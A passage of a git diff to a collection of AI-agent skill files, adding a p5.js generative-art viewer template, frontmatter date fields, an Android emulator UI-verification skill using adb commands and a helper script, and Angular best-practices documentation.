|
||||
function updateParameter(paramName, value) {
|
||||
params[paramName] = value;
|
||||
// Decide if you need to regenerate or just update
|
||||
// Some params can update in real-time, others need full regeneration
|
||||
}
|
||||
|
||||
function regenerate() {
|
||||
// Reinitialize your generative system
|
||||
// Useful when parameters change significantly
|
||||
initializeSeed(params.seed);
|
||||
// Then regenerate your system
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 8. COMMON P5.JS PATTERNS
|
||||
// ============================================================================
|
||||
|
||||
// Drawing with transparency for trails/fading
|
||||
function fadeBackground(opacity) {
|
||||
fill(250, 249, 245, opacity); // Anthropic light with alpha
|
||||
noStroke();
|
||||
rect(0, 0, width, height);
|
||||
}
|
||||
|
||||
// Using noise for organic variation
|
||||
function getNoiseValue(x, y, scale = 0.01) {
|
||||
return noise(x * scale, y * scale);
|
||||
}
|
||||
|
||||
// Creating vectors from angles
|
||||
function vectorFromAngle(angle, magnitude = 1) {
|
||||
return createVector(cos(angle), sin(angle)).mult(magnitude);
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 9. EXPORT FUNCTIONS
|
||||
// ============================================================================
|
||||
|
||||
function exportImage() {
|
||||
saveCanvas('generative-art-' + params.seed, 'png');
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// REMEMBER
|
||||
// ============================================================================
|
||||
//
|
||||
// These are TOOLS and PRINCIPLES, not a recipe.
|
||||
// Your algorithmic philosophy should guide WHAT you create.
|
||||
// This structure helps you create it WELL.
|
||||
//
|
||||
// Focus on:
|
||||
// - Clean, readable code
|
||||
// - Parameterized for exploration
|
||||
// - Seeded for reproducibility
|
||||
// - Performant execution
|
||||
//
|
||||
// The art itself is entirely up to you!
|
||||
//
|
||||
// ============================================================================
|
||||
599
web-app/public/skills/algorithmic-art/templates/viewer.html
Normal file
599
web-app/public/skills/algorithmic-art/templates/viewer.html
Normal file
@@ -0,0 +1,599 @@
|
||||
<!DOCTYPE html>
|
||||
<!--
|
||||
THIS IS A TEMPLATE THAT SHOULD BE USED EVERY TIME AND MODIFIED.
|
||||
WHAT TO KEEP:
|
||||
✓ Overall structure (header, sidebar, main content)
|
||||
✓ Anthropic branding (colors, fonts, layout)
|
||||
✓ Seed navigation section (always include this)
|
||||
✓ Self-contained artifact (everything inline)
|
||||
|
||||
WHAT TO CREATIVELY EDIT:
|
||||
✗ The p5.js algorithm (implement YOUR vision)
|
||||
✗ The parameters (define what YOUR art needs)
|
||||
✗ The UI controls (match YOUR parameters)
|
||||
|
||||
Let your philosophy guide the implementation.
|
||||
The world is your oyster - be creative!
|
||||
-->
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<title>Generative Art Viewer</title>
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/p5.js/1.7.0/p5.min.js"></script>
|
||||
<link rel="preconnect" href="https://fonts.googleapis.com">
|
||||
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
|
||||
<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600&family=Lora:wght@400;500&display=swap" rel="stylesheet">
|
||||
<style>
|
||||
/* Anthropic Brand Colors */
|
||||
:root {
|
||||
--anthropic-dark: #141413;
|
||||
--anthropic-light: #faf9f5;
|
||||
--anthropic-mid-gray: #b0aea5;
|
||||
--anthropic-light-gray: #e8e6dc;
|
||||
--anthropic-orange: #d97757;
|
||||
--anthropic-blue: #6a9bcc;
|
||||
--anthropic-green: #788c5d;
|
||||
}
|
||||
|
||||
* {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
box-sizing: border-box;
|
||||
}
|
||||
|
||||
body {
|
||||
font-family: 'Poppins', sans-serif;
|
||||
background: linear-gradient(135deg, var(--anthropic-light) 0%, #f5f3ee 100%);
|
||||
min-height: 100vh;
|
||||
color: var(--anthropic-dark);
|
||||
}
|
||||
|
||||
.container {
|
||||
display: flex;
|
||||
min-height: 100vh;
|
||||
padding: 20px;
|
||||
gap: 20px;
|
||||
}
|
||||
|
||||
/* Sidebar */
|
||||
.sidebar {
|
||||
width: 320px;
|
||||
flex-shrink: 0;
|
||||
background: rgba(255, 255, 255, 0.95);
|
||||
backdrop-filter: blur(10px);
|
||||
padding: 24px;
|
||||
border-radius: 12px;
|
||||
box-shadow: 0 10px 30px rgba(20, 20, 19, 0.1);
|
||||
overflow-y: auto;
|
||||
overflow-x: hidden;
|
||||
}
|
||||
|
||||
.sidebar h1 {
|
||||
font-family: 'Lora', serif;
|
||||
font-size: 24px;
|
||||
font-weight: 500;
|
||||
color: var(--anthropic-dark);
|
||||
margin-bottom: 8px;
|
||||
}
|
||||
|
||||
.sidebar .subtitle {
|
||||
color: var(--anthropic-mid-gray);
|
||||
font-size: 14px;
|
||||
margin-bottom: 32px;
|
||||
line-height: 1.4;
|
||||
}
|
||||
|
||||
/* Control Sections */
|
||||
.control-section {
|
||||
margin-bottom: 32px;
|
||||
}
|
||||
|
||||
.control-section h3 {
|
||||
font-size: 16px;
|
||||
font-weight: 600;
|
||||
color: var(--anthropic-dark);
|
||||
margin-bottom: 16px;
|
||||
display: flex;
|
||||
align-items: center;
|
||||
gap: 8px;
|
||||
}
|
||||
|
||||
.control-section h3::before {
|
||||
content: '•';
|
||||
color: var(--anthropic-orange);
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
/* Seed Controls */
|
||||
.seed-input {
|
||||
width: 100%;
|
||||
background: var(--anthropic-light);
|
||||
padding: 12px;
|
||||
border-radius: 8px;
|
||||
font-family: 'Courier New', monospace;
|
||||
font-size: 14px;
|
||||
margin-bottom: 12px;
|
||||
border: 1px solid var(--anthropic-light-gray);
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
.seed-input:focus {
|
||||
outline: none;
|
||||
border-color: var(--anthropic-orange);
|
||||
box-shadow: 0 0 0 2px rgba(217, 119, 87, 0.1);
|
||||
background: white;
|
||||
}
|
||||
|
||||
.seed-controls {
|
||||
display: grid;
|
||||
grid-template-columns: 1fr 1fr;
|
||||
gap: 8px;
|
||||
margin-bottom: 8px;
|
||||
}
|
||||
|
||||
.regen-button {
|
||||
margin-bottom: 0;
|
||||
}
|
||||
|
||||
/* Parameter Controls */
|
||||
.control-group {
|
||||
margin-bottom: 20px;
|
||||
}
|
||||
|
||||
.control-group label {
|
||||
display: block;
|
||||
font-size: 14px;
|
||||
font-weight: 500;
|
||||
color: var(--anthropic-dark);
|
||||
margin-bottom: 8px;
|
||||
}
|
||||
|
||||
.slider-container {
|
||||
display: flex;
|
||||
align-items: center;
|
||||
gap: 12px;
|
||||
}
|
||||
|
||||
.slider-container input[type="range"] {
|
||||
flex: 1;
|
||||
height: 4px;
|
||||
background: var(--anthropic-light-gray);
|
||||
border-radius: 2px;
|
||||
outline: none;
|
||||
-webkit-appearance: none;
|
||||
}
|
||||
|
||||
.slider-container input[type="range"]::-webkit-slider-thumb {
|
||||
-webkit-appearance: none;
|
||||
width: 16px;
|
||||
height: 16px;
|
||||
background: var(--anthropic-orange);
|
||||
border-radius: 50%;
|
||||
cursor: pointer;
|
||||
transition: all 0.2s ease;
|
||||
}
|
||||
|
||||
.slider-container input[type="range"]::-webkit-slider-thumb:hover {
|
||||
transform: scale(1.1);
|
||||
background: #c86641;
|
||||
}
|
||||
|
||||
.slider-container input[type="range"]::-moz-range-thumb {
|
||||
width: 16px;
|
||||
height: 16px;
|
||||
background: var(--anthropic-orange);
|
||||
border-radius: 50%;
|
||||
border: none;
|
||||
cursor: pointer;
|
||||
transition: all 0.2s ease;
|
||||
}
|
||||
|
||||
.value-display {
|
||||
font-family: 'Courier New', monospace;
|
||||
font-size: 12px;
|
||||
color: var(--anthropic-mid-gray);
|
||||
min-width: 60px;
|
||||
text-align: right;
|
||||
}
|
||||
|
||||
/* Color Pickers */
|
||||
.color-group {
|
||||
margin-bottom: 16px;
|
||||
}
|
||||
|
||||
.color-group label {
|
||||
display: block;
|
||||
font-size: 12px;
|
||||
color: var(--anthropic-mid-gray);
|
||||
margin-bottom: 4px;
|
||||
}
|
||||
|
||||
.color-picker-container {
|
||||
display: flex;
|
||||
align-items: center;
|
||||
gap: 8px;
|
||||
}
|
||||
|
||||
.color-picker-container input[type="color"] {
|
||||
width: 32px;
|
||||
height: 32px;
|
||||
border: none;
|
||||
border-radius: 6px;
|
||||
cursor: pointer;
|
||||
background: none;
|
||||
padding: 0;
|
||||
}
|
||||
|
||||
.color-value {
|
||||
font-family: 'Courier New', monospace;
|
||||
font-size: 12px;
|
||||
color: var(--anthropic-mid-gray);
|
||||
}
|
||||
|
||||
/* Buttons */
|
||||
.button {
|
||||
background: var(--anthropic-orange);
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 16px;
|
||||
border-radius: 6px;
|
||||
font-size: 14px;
|
||||
font-weight: 500;
|
||||
cursor: pointer;
|
||||
transition: all 0.2s ease;
|
||||
width: 100%;
|
||||
}
|
||||
|
||||
.button:hover {
|
||||
background: #c86641;
|
||||
transform: translateY(-1px);
|
||||
}
|
||||
|
||||
.button:active {
|
||||
transform: translateY(0);
|
||||
}
|
||||
|
||||
.button.secondary {
|
||||
background: var(--anthropic-blue);
|
||||
}
|
||||
|
||||
.button.secondary:hover {
|
||||
background: #5a8bb8;
|
||||
}
|
||||
|
||||
.button.tertiary {
|
||||
background: var(--anthropic-green);
|
||||
}
|
||||
|
||||
.button.tertiary:hover {
|
||||
background: #6b7b52;
|
||||
}
|
||||
|
||||
.button-row {
|
||||
display: flex;
|
||||
gap: 8px;
|
||||
}
|
||||
|
||||
.button-row .button {
|
||||
flex: 1;
|
||||
}
|
||||
|
||||
/* Canvas Area */
|
||||
.canvas-area {
|
||||
flex: 1;
|
||||
display: flex;
|
||||
align-items: center;
|
||||
justify-content: center;
|
||||
min-width: 0;
|
||||
}
|
||||
|
||||
#canvas-container {
|
||||
width: 100%;
|
||||
max-width: 1000px;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 20px 40px rgba(20, 20, 19, 0.1);
|
||||
background: white;
|
||||
}
|
||||
|
||||
#canvas-container canvas {
|
||||
display: block;
|
||||
width: 100% !important;
|
||||
height: auto !important;
|
||||
}
|
||||
|
||||
/* Loading State */
|
||||
.loading {
|
||||
display: flex;
|
||||
align-items: center;
|
||||
justify-content: center;
|
||||
font-size: 18px;
|
||||
color: var(--anthropic-mid-gray);
|
||||
}
|
||||
|
||||
/* Responsive - Stack on mobile */
|
||||
@media (max-width: 600px) {
|
||||
.container {
|
||||
flex-direction: column;
|
||||
}
|
||||
|
||||
.sidebar {
|
||||
width: 100%;
|
||||
}
|
||||
|
||||
.canvas-area {
|
||||
padding: 20px;
|
||||
}
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="container">
|
||||
<!-- Control Sidebar -->
|
||||
<div class="sidebar">
|
||||
<!-- Headers (CUSTOMIZE THIS FOR YOUR ART) -->
|
||||
<h1>TITLE - EDIT</h1>
|
||||
<div class="subtitle">SUBHEADER - EDIT</div>
|
||||
|
||||
<!-- Seed Section (ALWAYS KEEP THIS) -->
|
||||
<div class="control-section">
|
||||
<h3>Seed</h3>
|
||||
<input type="number" id="seed-input" class="seed-input" value="12345" onchange="updateSeed()">
|
||||
<div class="seed-controls">
|
||||
<button class="button secondary" onclick="previousSeed()">← Prev</button>
|
||||
<button class="button secondary" onclick="nextSeed()">Next →</button>
|
||||
</div>
|
||||
<button class="button tertiary regen-button" onclick="randomSeedAndUpdate()">↻ Random</button>
|
||||
</div>
|
||||
|
||||
<!-- Parameters Section (CUSTOMIZE THIS FOR YOUR ART) -->
|
||||
<div class="control-section">
|
||||
<h3>Parameters</h3>
|
||||
|
||||
<!-- Particle Count -->
|
||||
<div class="control-group">
|
||||
<label>Particle Count</label>
|
||||
<div class="slider-container">
|
||||
<input type="range" id="particleCount" min="1000" max="10000" step="500" value="5000" oninput="updateParam('particleCount', this.value)">
|
||||
<span class="value-display" id="particleCount-value">5000</span>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Flow Speed -->
|
||||
<div class="control-group">
|
||||
<label>Flow Speed</label>
|
||||
<div class="slider-container">
|
||||
<input type="range" id="flowSpeed" min="0.1" max="2.0" step="0.1" value="0.5" oninput="updateParam('flowSpeed', this.value)">
|
||||
<span class="value-display" id="flowSpeed-value">0.5</span>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Noise Scale -->
|
||||
<div class="control-group">
|
||||
<label>Noise Scale</label>
|
||||
<div class="slider-container">
|
||||
<input type="range" id="noiseScale" min="0.001" max="0.02" step="0.001" value="0.005" oninput="updateParam('noiseScale', this.value)">
|
||||
<span class="value-display" id="noiseScale-value">0.005</span>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Trail Length -->
|
||||
<div class="control-group">
|
||||
<label>Trail Length</label>
|
||||
<div class="slider-container">
|
||||
<input type="range" id="trailLength" min="2" max="20" step="1" value="8" oninput="updateParam('trailLength', this.value)">
|
||||
<span class="value-display" id="trailLength-value">8</span>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Colors Section (OPTIONAL - CUSTOMIZE OR REMOVE) -->
|
||||
<div class="control-section">
|
||||
<h3>Colors</h3>
|
||||
|
||||
<!-- Color 1 -->
|
||||
<div class="color-group">
|
||||
<label>Primary Color</label>
|
||||
<div class="color-picker-container">
|
||||
<input type="color" id="color1" value="#d97757" onchange="updateColor('color1', this.value)">
|
||||
<span class="color-value" id="color1-value">#d97757</span>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Color 2 -->
|
||||
<div class="color-group">
|
||||
<label>Secondary Color</label>
|
||||
<div class="color-picker-container">
|
||||
<input type="color" id="color2" value="#6a9bcc" onchange="updateColor('color2', this.value)">
|
||||
<span class="color-value" id="color2-value">#6a9bcc</span>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Color 3 -->
|
||||
<div class="color-group">
|
||||
<label>Accent Color</label>
|
||||
<div class="color-picker-container">
|
||||
<input type="color" id="color3" value="#788c5d" onchange="updateColor('color3', this.value)">
|
||||
<span class="color-value" id="color3-value">#788c5d</span>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Actions Section (ALWAYS KEEP THIS) -->
|
||||
<div class="control-section">
|
||||
<h3>Actions</h3>
|
||||
<div class="button-row">
|
||||
<button class="button" onclick="resetParameters()">Reset</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Main Canvas Area -->
|
||||
<div class="canvas-area">
|
||||
<div id="canvas-container">
|
||||
<div class="loading">Initializing generative art...</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<script>
|
||||
// ═══════════════════════════════════════════════════════════════════════
|
||||
// GENERATIVE ART PARAMETERS - CUSTOMIZE FOR YOUR ALGORITHM
|
||||
// ═══════════════════════════════════════════════════════════════════════
|
||||
|
||||
let params = {
|
||||
seed: 12345,
|
||||
particleCount: 5000,
|
||||
flowSpeed: 0.5,
|
||||
noiseScale: 0.005,
|
||||
trailLength: 8,
|
||||
colorPalette: ['#d97757', '#6a9bcc', '#788c5d']
|
||||
};
|
||||
|
||||
let defaultParams = {...params}; // Store defaults for reset
|
||||
|
||||
// ═══════════════════════════════════════════════════════════════════════
|
||||
// P5.JS GENERATIVE ART ALGORITHM - REPLACE WITH YOUR VISION
|
||||
// ═══════════════════════════════════════════════════════════════════════
|
||||
|
||||
let particles = [];
|
||||
let flowField = [];
|
||||
let cols, rows;
|
||||
let scl = 10; // Flow field resolution
|
||||
|
||||
function setup() {
|
||||
let canvas = createCanvas(1200, 1200);
|
||||
canvas.parent('canvas-container');
|
||||
|
||||
initializeSystem();
|
||||
|
||||
// Remove loading message
|
||||
document.querySelector('.loading').style.display = 'none';
|
||||
}
|
||||
|
||||
function initializeSystem() {
|
||||
// Seed the randomness for reproducibility
|
||||
randomSeed(params.seed);
|
||||
noiseSeed(params.seed);
|
||||
|
||||
// Clear particles and recreate
|
||||
particles = [];
|
||||
|
||||
// Initialize particles
|
||||
for (let i = 0; i < params.particleCount; i++) {
|
||||
particles.push(new Particle());
|
||||
}
|
||||
|
||||
// Calculate flow field dimensions
|
||||
cols = floor(width / scl);
|
||||
rows = floor(height / scl);
|
||||
|
||||
// Generate flow field
|
||||
generateFlowField();
|
||||
|
||||
// Clear background
|
||||
background(250, 249, 245); // Anthropic light background
|
||||
}
|
||||
|
||||
function generateFlowField() {
|
||||
// fill this in
|
||||
}
|
||||
|
||||
function draw() {
|
||||
// fill this in
|
||||
}
|
||||
|
||||
// ═══════════════════════════════════════════════════════════════════════
|
||||
// PARTICLE SYSTEM - CUSTOMIZE FOR YOUR ALGORITHM
|
||||
// ═══════════════════════════════════════════════════════════════════════
|
||||
|
||||
class Particle {
|
||||
constructor() {
|
||||
// fill this in
|
||||
}
|
||||
// fill this in
|
||||
}
|
||||
|
||||
// ═══════════════════════════════════════════════════════════════════════
|
||||
// UI CONTROL HANDLERS - CUSTOMIZE FOR YOUR PARAMETERS
|
||||
// ═══════════════════════════════════════════════════════════════════════
|
||||
|
||||
function updateParam(paramName, value) {
|
||||
// fill this in
|
||||
}
|
||||
|
||||
function updateColor(colorId, value) {
|
||||
// fill this in
|
||||
}
|
||||
|
||||
// ═══════════════════════════════════════════════════════════════════════
|
||||
// SEED CONTROL FUNCTIONS - ALWAYS KEEP THESE
|
||||
// ═══════════════════════════════════════════════════════════════════════
|
||||
|
||||
function updateSeedDisplay() {
|
||||
document.getElementById('seed-input').value = params.seed;
|
||||
}
|
||||
|
||||
function updateSeed() {
|
||||
let input = document.getElementById('seed-input');
|
||||
let newSeed = parseInt(input.value);
|
||||
if (newSeed && newSeed > 0) {
|
||||
params.seed = newSeed;
|
||||
initializeSystem();
|
||||
} else {
|
||||
// Reset to current seed if invalid
|
||||
updateSeedDisplay();
|
||||
}
|
||||
}
|
||||
|
||||
function previousSeed() {
|
||||
params.seed = Math.max(1, params.seed - 1);
|
||||
updateSeedDisplay();
|
||||
initializeSystem();
|
||||
}
|
||||
|
||||
function nextSeed() {
|
||||
params.seed = params.seed + 1;
|
||||
updateSeedDisplay();
|
||||
initializeSystem();
|
||||
}
|
||||
|
||||
function randomSeedAndUpdate() {
|
||||
params.seed = Math.floor(Math.random() * 999999) + 1;
|
||||
updateSeedDisplay();
|
||||
initializeSystem();
|
||||
}
|
||||
|
||||
function resetParameters() {
|
||||
params = {...defaultParams};
|
||||
|
||||
// Update UI elements
|
||||
document.getElementById('particleCount').value = params.particleCount;
|
||||
document.getElementById('particleCount-value').textContent = params.particleCount;
|
||||
document.getElementById('flowSpeed').value = params.flowSpeed;
|
||||
document.getElementById('flowSpeed-value').textContent = params.flowSpeed;
|
||||
document.getElementById('noiseScale').value = params.noiseScale;
|
||||
document.getElementById('noiseScale-value').textContent = params.noiseScale;
|
||||
document.getElementById('trailLength').value = params.trailLength;
|
||||
document.getElementById('trailLength-value').textContent = params.trailLength;
|
||||
|
||||
// Reset colors
|
||||
document.getElementById('color1').value = params.colorPalette[0];
|
||||
document.getElementById('color1-value').textContent = params.colorPalette[0];
|
||||
document.getElementById('color2').value = params.colorPalette[1];
|
||||
document.getElementById('color2-value').textContent = params.colorPalette[1];
|
||||
document.getElementById('color3').value = params.colorPalette[2];
|
||||
document.getElementById('color3-value').textContent = params.colorPalette[2];
|
||||
|
||||
updateSeedDisplay();
|
||||
initializeSystem();
|
||||
}
|
||||
|
||||
// Initialize UI on load
|
||||
window.addEventListener('load', function() {
|
||||
updateSeedDisplay();
|
||||
});
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,10 +1,9 @@
|
||||
---
|
||||
name: amplitude-automation
|
||||
description: "Automate Amplitude tasks via Rube MCP (Composio): events, user activity, cohorts, user identification. Always search tools first for current schemas."
|
||||
requires:
|
||||
mcp: [rube]
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Amplitude Automation via Rube MCP
|
||||
|
||||
@@ -1,13 +1,9 @@
|
||||
---
|
||||
name: analytics-tracking
|
||||
description: >
|
||||
Design, audit, and improve analytics tracking systems that produce reliable,
|
||||
decision-ready data. Use when the user wants to set up, fix, or evaluate
|
||||
analytics tracking (GA4, GTM, product analytics, events, conversions, UTMs).
|
||||
This skill focuses on measurement strategy, signal quality, and validation—
|
||||
not just firing events.
|
||||
description: Design, audit, and improve analytics tracking systems that produce reliable, decision-ready data.
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: '2026-02-27'
|
||||
---
|
||||
|
||||
# Analytics Tracking & Measurement Strategy
|
||||
|
||||
@@ -1,8 +1,9 @@
|
||||
---
|
||||
name: android-jetpack-compose-expert
|
||||
description: Expert guidance for building modern Android UIs with Jetpack Compose, covering state management, navigation, performance, and Material Design 3.
|
||||
description: "Expert guidance for building modern Android UIs with Jetpack Compose, covering state management, navigation, performance, and Material Design 3."
|
||||
risk: safe
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Android Jetpack Compose Expert
|
||||
|
||||
66
web-app/public/skills/android_ui_verification/SKILL.md
Normal file
66
web-app/public/skills/android_ui_verification/SKILL.md
Normal file
@@ -0,0 +1,66 @@
|
||||
---
|
||||
name: android_ui_verification
|
||||
description: Automated end-to-end UI testing and verification on an Android Emulator using ADB.
|
||||
risk: safe
|
||||
source: community
|
||||
date_added: "2026-02-28"
|
||||
---
|
||||
|
||||
# Android UI Verification Skill
|
||||
|
||||
This skill provides a systematic approach to testing React Native applications on an Android emulator using ADB commands. It allows for autonomous interaction, state verification, and visual regression checking.
|
||||
|
||||
## When to Use
|
||||
- Verifying UI changes in React Native or Native Android apps.
|
||||
- Autonomous debugging of layout issues or interaction bugs.
|
||||
- Ensuring feature functionality when manual testing is too slow.
|
||||
- Capturing automated screenshots for PR documentation.
|
||||
|
||||
## 🛠 Prerequisites
|
||||
- Android Emulator running.
|
||||
- `adb` installed and in PATH.
|
||||
- Application in debug mode for logcat access.
|
||||
|
||||
## 🚀 Workflow
|
||||
|
||||
### 1. Device Calibration
|
||||
Before interacting, always verify the screen resolution to ensure tap coordinates are accurate.
|
||||
```bash
|
||||
adb shell wm size
|
||||
```
|
||||
*Note: Layouts are often scaled. Use the physical size returned as the base for coordinate calculations.*
|
||||
|
||||
### 2. UI Inspection (State Discovery)
|
||||
Use the `uiautomator` dump to find the exact bounds of UI elements (buttons, inputs).
|
||||
```bash
|
||||
adb shell uiautomator dump /sdcard/view.xml && adb pull /sdcard/view.xml ./artifacts/view.xml
|
||||
```
|
||||
Search the `view.xml` for `text`, `content-desc`, or `resource-id`. The `bounds` attribute `[x1,y1][x2,y2]` defines the clickable area.
|
||||
|
||||
### 3. Interaction Commands
|
||||
- **Tap**: `adb shell input tap <x> <y>` (Use the center of the element bounds).
|
||||
- **Swipe**: `adb shell input swipe <x1> <y1> <x2> <y2> <duration_ms>` (Used for scrolling).
|
||||
- **Text Input**: `adb shell input text "<message>"` (Note: Limited support for special characters).
|
||||
- **Key Events**: `adb shell input keyevent <code_id>` (e.g., 66 for Enter).
|
||||
|
||||
### 4. Verification & Reporting
|
||||
#### Visual Verification
|
||||
Capture a screenshot after interaction to confirm UI changes.
|
||||
```bash
|
||||
adb shell screencap -p /sdcard/screen.png && adb pull /sdcard/screen.png ./artifacts/test_result.png
|
||||
```
|
||||
|
||||
#### Analytical Verification
|
||||
Monitor the JS console logs in real-time to detect errors or log successes.
|
||||
```bash
|
||||
adb logcat -d | grep "ReactNativeJS" | tail -n 20
|
||||
```
|
||||
|
||||
#### Cleanup
|
||||
Always store generated files in the `artifacts/` folder to satisfy project organization rules.
|
||||
|
||||
## 💡 Best Practices
|
||||
- **Wait for Animations**: Always add a short sleep (e.g., 1-2s) between interaction and verification.
|
||||
- **Center Taps**: Calculate the arithmetic mean of `[x1,y1][x2,y2]` for the most reliable tap target.
|
||||
- **Log Markers**: Use distinct log messages in the code (e.g., `✅ Action Successful`) to make `grep` verification easy.
|
||||
- **Fail Fast**: If a `uiautomator dump` fails or doesn't find the expected text, stop and troubleshoot rather than blind-tapping.
|
||||
@@ -0,0 +1,32 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Helper script for Android UI Verification Skill
|
||||
# Usage: ./verify_ui.sh [screenshot_name]
|
||||
|
||||
ARTIFACTS_DIR="./artifacts"
|
||||
SCREENSHOT_NAME="${1:-latest_screen}"
|
||||
|
||||
echo "🚀 Starting UI Verification..."
|
||||
|
||||
# 1. Create artifacts directory if not exists
|
||||
mkdir -p "$ARTIFACTS_DIR"
|
||||
|
||||
# 2. Get Resolution
|
||||
echo "📏 Calibrating display..."
|
||||
adb shell wm size
|
||||
|
||||
# 3. Dump UI XML
|
||||
echo "📋 Dumping UI hierarchy..."
|
||||
adb shell uiautomator dump /sdcard/view.xml
|
||||
adb pull /sdcard/view.xml "$ARTIFACTS_DIR/view.xml"
|
||||
|
||||
# 4. Capture Screenshot
|
||||
echo "📸 Capturing screenshot: $SCREENSHOT_NAME.png"
|
||||
adb shell screencap -p /sdcard/screen.png
|
||||
adb pull /sdcard/screen.png "$ARTIFACTS_DIR/$SCREENSHOT_NAME.png"
|
||||
|
||||
# 5. Get Recent JS Logs
|
||||
echo "📜 Fetching recent JS logs..."
|
||||
adb logcat -d | grep "ReactNativeJS" | tail -n 20 > "$ARTIFACTS_DIR/js_logs.txt"
|
||||
|
||||
echo "✅ Done. Artifacts saved in $ARTIFACTS_DIR"
|
||||
58
web-app/public/skills/angular-best-practices/README.md
Normal file
58
web-app/public/skills/angular-best-practices/README.md
Normal file
@@ -0,0 +1,58 @@
|
||||
# Angular Best Practices
|
||||
|
||||
Performance optimization and best practices for Angular applications optimized for AI agents and LLMs.
|
||||
|
||||
## Overview
|
||||
|
||||
This skill provides prioritized performance guidelines across:
|
||||
|
||||
- **Change Detection** - OnPush strategy, Signals, Zoneless apps
|
||||
- **Async Operations** - Avoiding waterfalls, SSR preloading
|
||||
- **Bundle Optimization** - Lazy loading, `@defer`, tree-shaking
|
||||
- **Rendering Performance** - TrackBy, virtual scrolling, CDK
|
||||
- **SSR & Hydration** - Server-side rendering patterns
|
||||
- **Template Optimization** - Structural directives, pipe memoization
|
||||
- **State Management** - Efficient reactivity patterns
|
||||
- **Memory Management** - Subscription cleanup, detached refs
|
||||
|
||||
## Structure
|
||||
|
||||
The `SKILL.md` file is organized by priority:
|
||||
|
||||
1. **Critical Priority** - Largest performance gains (change detection, async)
|
||||
2. **High Priority** - Significant impact (bundles, rendering)
|
||||
3. **Medium Priority** - Noticeable improvements (SSR, templates)
|
||||
4. **Low Priority** - Incremental gains (memory, cleanup)
|
||||
|
||||
Each rule includes:
|
||||
|
||||
- ❌ **WRONG** - What not to do
|
||||
- ✅ **CORRECT** - Recommended pattern
|
||||
- 📝 **Why** - Explanation of the impact
|
||||
|
||||
## Quick Reference Checklist
|
||||
|
||||
**For New Components:**
|
||||
|
||||
- [ ] Using `ChangeDetectionStrategy.OnPush`
|
||||
- [ ] Using Signals for reactive state
|
||||
- [ ] Using `@defer` for non-critical content
|
||||
- [ ] Using `trackBy` for `*ngFor` loops
|
||||
- [ ] No subscriptions without cleanup
|
||||
|
||||
**For Performance Reviews:**
|
||||
|
||||
- [ ] No async waterfalls (parallel data fetching)
|
||||
- [ ] Routes lazy-loaded
|
||||
- [ ] Large libraries code-split
|
||||
- [ ] Images use `NgOptimizedImage`
|
||||
|
||||
## Version
|
||||
|
||||
Current version: 1.0.0 (February 2026)
|
||||
|
||||
## References
|
||||
|
||||
- [Angular Performance](https://angular.dev/guide/performance)
|
||||
- [Zoneless Angular](https://angular.dev/guide/zoneless)
|
||||
- [Angular SSR](https://angular.dev/guide/ssr)
|
||||
@@ -3,6 +3,7 @@ name: angular-best-practices
|
||||
description: "Angular performance optimization and best practices guide. Use when writing, reviewing, or refactoring Angular code for optimal performance, bundle size, and rendering efficiency."
|
||||
risk: safe
|
||||
source: self
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Angular Best Practices
|
||||
|
||||
13
web-app/public/skills/angular-best-practices/metadata.json
Normal file
13
web-app/public/skills/angular-best-practices/metadata.json
Normal file
@@ -0,0 +1,13 @@
|
||||
{
|
||||
"version": "1.0.0",
|
||||
"organization": "Antigravity Awesome Skills",
|
||||
"date": "February 2026",
|
||||
"abstract": "Performance optimization and best practices guide for Angular applications designed for AI agents and LLMs. Covers change detection strategies (OnPush, Signals, Zoneless), avoiding async waterfalls, bundle optimization with lazy loading and @defer, rendering performance, SSR/hydration patterns, and memory management. Prioritized by impact from critical to incremental improvements.",
|
||||
"references": [
|
||||
"https://angular.dev/best-practices",
|
||||
"https://angular.dev/guide/performance",
|
||||
"https://angular.dev/guide/zoneless",
|
||||
"https://angular.dev/guide/ssr",
|
||||
"https://web.dev/performance"
|
||||
]
|
||||
}
|
||||
@@ -3,6 +3,7 @@ name: angular-migration
|
||||
description: "Migrate from AngularJS to Angular using hybrid mode, incremental component rewriting, and dependency injection updates. Use when upgrading AngularJS applications, planning framework migrations, or ..."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Angular Migration
|
||||
|
||||
41
web-app/public/skills/angular-state-management/README.md
Normal file
41
web-app/public/skills/angular-state-management/README.md
Normal file
@@ -0,0 +1,41 @@
|
||||
# Angular State Management
|
||||
|
||||
Complete state management patterns for Angular applications optimized for AI agents and LLMs.
|
||||
|
||||
## Overview
|
||||
|
||||
This skill provides decision frameworks and implementation patterns for:
|
||||
|
||||
